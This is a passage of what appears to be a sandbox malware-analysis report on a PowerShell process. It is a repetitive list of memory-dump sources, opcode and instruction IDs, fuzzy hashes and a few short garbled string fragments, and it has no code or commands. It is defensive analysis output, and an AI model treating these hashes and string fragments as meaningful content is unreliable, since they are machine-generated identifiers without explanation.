                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f8dd5bd8771ec79c7dcbd44bcfb234f6acde8de8c48b4d0a32761292f5bb3cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACF0A7B57001148FCB10C7BD984069ABBE2EBCC3517054194E50ACB350DF30EC018B90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fc79729a171e6ba8c19beb8878bd65072f16df339b34f753652aa71a7cecd023
                                                                                                                                                                                                                      • Instruction ID: 50a79ae3afd7c4db05351b5b3adb6ec29efc78ed841b3f57bd0e528c2ded0bc8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc79729a171e6ba8c19beb8878bd65072f16df339b34f753652aa71a7cecd023
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE01A793006118F87109B5ED498C26BBFAEFCE76571940E9E549CB771DB61EC01CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6974ce7536fda1e7b0903cb341c6dee1f4b5ac6215c09c63e2ec55cdf9f55093
                                                                                                                                                                                                                      • Instruction ID: 2356a3e7f48f5b2a4c2134de36c529a324ef173b1f1f8845bfc90062fd5a9251
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6974ce7536fda1e7b0903cb341c6dee1f4b5ac6215c09c63e2ec55cdf9f55093
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE0DF323093D31BCB17922D6854466FF778BC362431888FBE680CB2C6DE62881A8391
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a3d0e819154211f736de0501cdbc68c11daf18cc79100aeea9a806bef140c3c0
                                                                                                                                                                                                                      • Instruction ID: f67053f0e9a0bb75a7790ae026a775a1c8abc74991638e924d79b6ef2c6d7aba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d0e819154211f736de0501cdbc68c11daf18cc79100aeea9a806bef140c3c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14F06D70A003049BD7609F79D89C79ABBE9FB44720F404469E54ED3380DB396882CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 306a25426b82873ea274026a9645c8e6db2451b1d22e7f5a8ab9a32caf653963
                                                                                                                                                                                                                      • Instruction ID: 78a2a1011507b116bc01431f3a3d13a162ae6d33a8da63e4586b9655dc2d791f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 306a25426b82873ea274026a9645c8e6db2451b1d22e7f5a8ab9a32caf653963
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DE0C21270261623065670BA68C06BBDDCF8FC559470400B9D954C37C3FD40CD0143E6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 042b9acf77efb166f569d64c18f2caf6e737d3a5a5f194f1c1cedc0010097d8a
                                                                                                                                                                                                                      • Instruction ID: 45c9c62b6fbff05a0f98488cc5f8c05ef4210c979337c8374de626b49e18c59a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 042b9acf77efb166f569d64c18f2caf6e737d3a5a5f194f1c1cedc0010097d8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0263170421447CB0A3775A80C6AE7A57FBD4735F01002AE61A83380CF3D280387E9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: adc295903a31e1d7922b05ad54555e803674451cbde3a5c3e0835c8a54d5aaa9
                                                                                                                                                                                                                      • Instruction ID: d69aba5df2d53a459ef6710e8a25350417ae369118e4df90aef45e1d7b6389b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adc295903a31e1d7922b05ad54555e803674451cbde3a5c3e0835c8a54d5aaa9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D05E52702A2627096A70BAA8806BBD9CFCBC8AA470501BADA49C33C3ED41CD0143E5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5d3df62aca54a0c3c408f569815cb9d9e0ed46c9e80f550928deaac860dde5bf
                                                                                                                                                                                                                      • Instruction ID: 88b1c20e59405f8b41cc3cc8bd97c0b199a2709998c8aacf9e7140f6b11a0f00
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3df62aca54a0c3c408f569815cb9d9e0ed46c9e80f550928deaac860dde5bf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0C232740725478622A76EA81095FBBDBEFC4672310446EE519C7380DFA4EC0287D5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                      • Instruction ID: 8075396fd184ceebc3ba72daf25791bbdee3e47b58393365dffca32231b48b74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2E08631B10014978B089999D4544EDFBAAEBCD220F0480BAD90AA7380DA325915C6E1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 39ce54ad5ec54fbba5ab8761d1ec04ee9bf13fe3b8ed65f2406837a76e7397d8
                                                                                                                                                                                                                      • Instruction ID: 43d6d70afb35dec08765386580d273e01883db0823c8769e93ddfe2480b253a5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39ce54ad5ec54fbba5ab8761d1ec04ee9bf13fe3b8ed65f2406837a76e7397d8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE01A3080524A8BCB09AF68E85A8AABF30FF11311F4105A9E94392681EB35265BCBC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3f801ffe5d979ed4ebb83efcc87208173978e1a0d07e24c5544a29f2ee5a10ac
                                                                                                                                                                                                                      • Instruction ID: dd3ce9cde8980ef9a5e5150afe517115fa8f655c3c777f417873a8450dd29768
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f801ffe5d979ed4ebb83efcc87208173978e1a0d07e24c5544a29f2ee5a10ac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE01A39A0820B9FCB149BA4E48A9AABFB1BB15315B104555ED0593390EB35685ACB81
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 460fc5f0b8029be0358a5f0836bf93a31090bd5e93dba4cbcf524949903040e7
                                                                                                                                                                                                                      • Instruction ID: 8724e1a7f3ad7924787508c70dd6e6d1a62e20abade2bc06ac85e22bb46c65da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 460fc5f0b8029be0358a5f0836bf93a31090bd5e93dba4cbcf524949903040e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E09A70D04209AF8780DFB898815AEFFF0EB49204B1484AA9908E7311EA318602CB91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b76ecad4323ba82a5050e7242b1dd59122e0e1242438b65696c8f48df44878b7
                                                                                                                                                                                                                      • Instruction ID: 326a35880c8759c018e10a95afe435df32695aee6a09f0f33571d6c0d49c836e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b76ecad4323ba82a5050e7242b1dd59122e0e1242438b65696c8f48df44878b7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0C231B406298FCF12EBE9D1407DEBBA1EFC4272F0048A8D109AB180DB3459458F96
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4dd5baf27e1452b02cb676c2fd862083e81d33df5ad27cbfd91fc9f151732bc8
                                                                                                                                                                                                                      • Instruction ID: 1c5b70f3ca4ebc854bb29c08e1e684a0f537c3f4d4bd2937af865503d8a34e64
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dd5baf27e1452b02cb676c2fd862083e81d33df5ad27cbfd91fc9f151732bc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89D0A73200C3854FC70317307424091BF34FF4A02430504DAE44A4B1A389655B48C7A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction ID: 4e5248f01af8ffe2f0b2634c42c96051942b3939f32500304a78ada46e23d0cd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFD067B0D042099F8790EFADC94156EFFF4EB48204F6485AA8919E7341EB329A12CBD1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c13bdd138951e35d52e2101d422365775dc3a961eae7b8cfb54f73ed256cdb8b
                                                                                                                                                                                                                      • Instruction ID: 3cf4ce77185b284e1e8cb016a3b5e670fa9e8fc4ce89235b965f2c2edc67788e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c13bdd138951e35d52e2101d422365775dc3a961eae7b8cfb54f73ed256cdb8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64D067318041098BCB19ABA4E85B4BDBB74FF24311F4141A9E90752290EE362A5BCAC5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 66bbfe40f9dc8860f2f8a68c170bf94a2e521aa3fc1ebaa93cc0917a712bf59b
                                                                                                                                                                                                                      • Instruction ID: 645a4b5af28cd117972c17257e5f923992a9cb1cbe42806da0e3ea7982948836
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66bbfe40f9dc8860f2f8a68c170bf94a2e521aa3fc1ebaa93cc0917a712bf59b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2D01234E0420A9BCB14EFA4D45687EBFB5BB44300F004155ED0593354EA306902CBC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 076181a6b715b69f8a8a155621e254d6672937cc700521b3a709d4d72293da1f
                                                                                                                                                                                                                      • Instruction ID: aae42b040884de77f9e4eebb99656afe752f86510e6fa8b147ce8d8f8e7bec86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 076181a6b715b69f8a8a155621e254d6672937cc700521b3a709d4d72293da1f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92C02B1B4693800FEF03923E1C21093BF30588322270682C3D804C7022D818CB0AC2B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 656200c9d2022b70d40e654837e2c626d8ac7827e3cad4938fda2211c3eada25
                                                                                                                                                                                                                      • Instruction ID: 74ee3f94e44a9ef67d6666758de5da85d2a4f25bb3740102d18522fcb1c2883e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 656200c9d2022b70d40e654837e2c626d8ac7827e3cad4938fda2211c3eada25
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8B092310447098FC2596F75E4088147729BF4422938009A8E90F0A6928E37E899CA49
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                                                                                                                                                                                      • Instruction ID: f27fff439198944d3872e33991fac2e58cc5f5c2fac47effd9d5deba5fade7de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFB01236A0000DCACF10CBC4F0403ECBF70E780236F0000A3C20C73480837002649692
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                                                                                                                                                                                      • Instruction ID: f27fff439198944d3872e33991fac2e58cc5f5c2fac47effd9d5deba5fade7de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFB01236A0000DCACF10CBC4F0403ECBF70E780236F0000A3C20C73480837002649692
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$wl$wl
                                                                                                                                                                                                                      • API String ID: 0-1202610410
                                                                                                                                                                                                                      • Opcode ID: 9239e0f7920d7bd45e663fe564060a451a01c4ce40e8d96bbd07213e6718010b
                                                                                                                                                                                                                      • Instruction ID: 6b2304706884245beee9a8c8fd7eef0ccec34078e1381eda7e0acf4d578dbee2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9239e0f7920d7bd45e663fe564060a451a01c4ce40e8d96bbd07213e6718010b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBA18832B043558FDBE49A6888017BABBE2AFC5725F1484ABE409CF395CE31DC45D7A1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $ctk$4'^q$4'^q$4'^q$4'^q$piIk$tP^q$tP^q
                                                                                                                                                                                                                      • API String ID: 0-3866849059
                                                                                                                                                                                                                      • Opcode ID: 24addc4e84183ad7bff3e66f7dee272d534b308b117f79ed5b721a8cd3ab203a
                                                                                                                                                                                                                      • Instruction ID: 45874072c0e6d73f0ef25b949447730c62f4beac7ffd99929f6fb71248937236
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24addc4e84183ad7bff3e66f7dee272d534b308b117f79ed5b721a8cd3ab203a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37D13631F04315CFCB649B6884146EABBF2AFC5316F2884BAD5198F251DB31C985CBE2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$wl$wl
                                                                                                                                                                                                                      • API String ID: 0-2658502661
                                                                                                                                                                                                                      • Opcode ID: e236adf2421adb1146ef29a56f5ce5a359b2c342ab5033684e106b8380eba443
                                                                                                                                                                                                                      • Instruction ID: b6eaa147ef54e6c0c9867c51cfdbb5ace2618fab01625e37876d1285c6dd5652
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e236adf2421adb1146ef29a56f5ce5a359b2c342ab5033684e106b8380eba443
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF515772B04309DFEBE49A6984017A7BBF2AFC5725F24847BD405CB281DB31C885D7A1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-2717029046
                                                                                                                                                                                                                      • Opcode ID: b4a559f3bd476295be7da362faa2a9547598984675188893351cddd240ec39d5
                                                                                                                                                                                                                      • Instruction ID: 91d2710da68de3a38aa363adb5c51ecdea1b56ad2b689376489ba48f0a7bfe87
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4a559f3bd476295be7da362faa2a9547598984675188893351cddd240ec39d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFF154B1B043558FDB659B78D4107AABBE2AFC1325F1484BAD509CB282DF31D882C7E1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$p5qk$tP^q$tP^q
                                                                                                                                                                                                                      • API String ID: 0-3801843625
                                                                                                                                                                                                                      • Opcode ID: d745be5da42b3cf8196141e7a8d5f9e1f94888b16c1a06d143825bd4aa27604f
                                                                                                                                                                                                                      • Instruction ID: 7ae3aba651ebd54903d9c5aae89b90e045a1be41c5cec9f27ce3c63eecfd3137
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d745be5da42b3cf8196141e7a8d5f9e1f94888b16c1a06d143825bd4aa27604f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16C19831F043459FCBE59B6888057AABBF2AFC5315F1484BAD519CB381DA31C881D7E2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                      • API String ID: 0-3297199963
                                                                                                                                                                                                                      • Opcode ID: 7fa6662d8cf1a0cd24d90a7daebdf6f69468faf7ba5aa3ee1341c26e07f007dc
                                                                                                                                                                                                                      • Instruction ID: 24158a75c90e2ac0bc83d36ddff8074253938a53503454390d9da1ebc94d0005
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fa6662d8cf1a0cd24d90a7daebdf6f69468faf7ba5aa3ee1341c26e07f007dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB19574E003199FDB55DFA9D590A9EFBF2FF88300F108669E819AB345DB30A9458F90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                      • API String ID: 0-3297199963
                                                                                                                                                                                                                      • Opcode ID: f06852418bbbc958e7396c099e7a7b9db2bb5cffe4c647420d2796f960d6681d
                                                                                                                                                                                                                      • Instruction ID: 99489e2128043ba0ab29fd349a708f8ad23348ea6c496b62446ab6ff448644f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f06852418bbbc958e7396c099e7a7b9db2bb5cffe4c647420d2796f960d6681d
